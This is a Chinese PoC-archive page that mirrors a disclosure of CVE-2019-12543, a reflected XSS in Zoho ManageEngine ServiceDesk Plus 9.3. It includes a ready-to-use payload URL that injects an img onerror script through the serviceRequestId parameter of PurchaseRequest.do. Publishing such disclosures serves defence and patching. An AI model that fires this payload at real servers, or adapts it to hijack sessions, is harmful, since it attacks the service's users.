POC详情: ae8f93da96ddc7aed2ac428917505aca42b61615

来源
https://github.com/tarantula-team/CVE-2019-12543
关联漏洞
标题: ZOHO ManageEngine ServiceDesk Plus 跨站脚本漏洞 (CVE-2019-12543)
描述:ZOHO ManageEngine ServiceDesk Plus是美国卓豪(ZOHO)公司的一套基于ITIL架构的IT服务管理软件(ITSM)。该软件集成了事件管理、问题管理、资产管理、IT项目管理、采购与合同管理等功能模块。 ZOHO ManageEngine ServiceDesk Plus 9.3版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
介绍
# CVE-2019-12543 Zoho ManageEngine ServiceDesk Plus 9.3 XSS vulnerability in PurchaseRequest.do
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter. 

**Author: Concobe of Tarantula Team - VinCSS (a member of Vingroup)**

# Payload 

domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1
文件快照

 [4.0K]  /data/pocs/ae8f93da96ddc7aed2ac428917505aca42b61615
└── [ 467]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。